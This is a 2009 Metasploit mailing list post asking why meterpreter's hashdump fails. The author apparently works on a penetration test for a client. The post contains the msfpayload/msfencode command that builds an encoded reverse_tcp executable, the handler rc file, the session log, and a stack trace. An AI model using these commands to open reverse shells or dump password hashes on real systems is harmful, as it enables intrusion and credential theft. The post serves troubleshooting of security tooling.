Metasploit mailing list archives

Problem with meterpreter, priv, hashdump, etc.


From: wfdawson at bellsouth.net (wfdawson at bellsouth.net)
Date: Sat, 18 Apr 2009 19:24:45 +0000

Hi all,

I have used msfpayload to create a .exe to connect back to me successfully in the past, and find it to be a great tool.
However, today I seem to be hitting the wall when I try to get a hashdump out of the remote system.  Here's the scenario:

I should add, this is all done with a fresh local copy from the subversion trunk, revision 6490, and with ~/.msf3 
removed entirely and refreshed by a new call to msfconsole before starting.

I created an executable with the following command:


./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe

I started msfconsole (as root) with an rc file:


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
exploit

My session started just fine:


resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp           
resource> set LHOST x.x.x.x                    
LHOST => x.x.x.x                               
resource> set LPORT 443                              
LPORT => 443                                         
resource> exploit                                    
[*] Handler binding to LHOST 0.0.0.0                 
[*] Started reverse handler                          
[*] Starting the payload handler...                  

On the remote system, I started the rv_443.exe and saw the connection back to my msfconsole session:


[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)                                         
[*] Sleeping before handling stage...                                  
[*] Uploading DLL (75787 bytes)...                                     
[*] Upload completed.                                                  
[*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:1210)

And, I was able to get info back from the remote system, as expected.


meterpreter > sysinfo
Computer: sanitized for the clients protection!
OS      : Windows XP (Build 2600, Service Pack 3).
meterpreter > ls                                  

Listing: C:\DOKUME~1\someuser\LOKALE~1\Temp\FFC0EAB.tmp
=====================================================

Mode              Size     Type  Last modified                   Name                 
----              ----     ----  -------------                   ----                 
40777/rwxrwxrwx   0        dir   Wed Dec 31 19:00:00 -0500 1969  .                    
40777/rwxrwxrwx   0        dir   Wed Dec 31 19:00:00 -0500 1969  ..                   
etc.
etc.
etc.

However, when I tried to use priv and then execute hashdump, or any other command thereafter, I got errors.  I got no 
errors with 'ls' just after 'use priv', but I did get errors with 'ls' after 'hashdump'.


meterpreter > hashdump
[-] Error running command hashdump: wrong number of arguments (0 for 1)
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `initialize'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `exception'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `raise'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `send_request'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/extensions/priv/priv.rb:44:in `sam_hashes'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb:39:in `cmd_hashdump'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in `call'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in `run'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
/home/wdawson/Software/metasploit/framework3/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/interactive.rb:48:in `interact'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/core.rb:997:in `cmd_sessions'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:190:in `load_resource'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in `each_line'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in `load_resource'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:103:in `initialize'
./msfconsole:82:in `new'
./msfconsole:82

Would this be at all due to the fact that the remote system is (seemingly) using a German locale, or is it due to some 
other factor?

Thanks in advance for any suggestions or insight.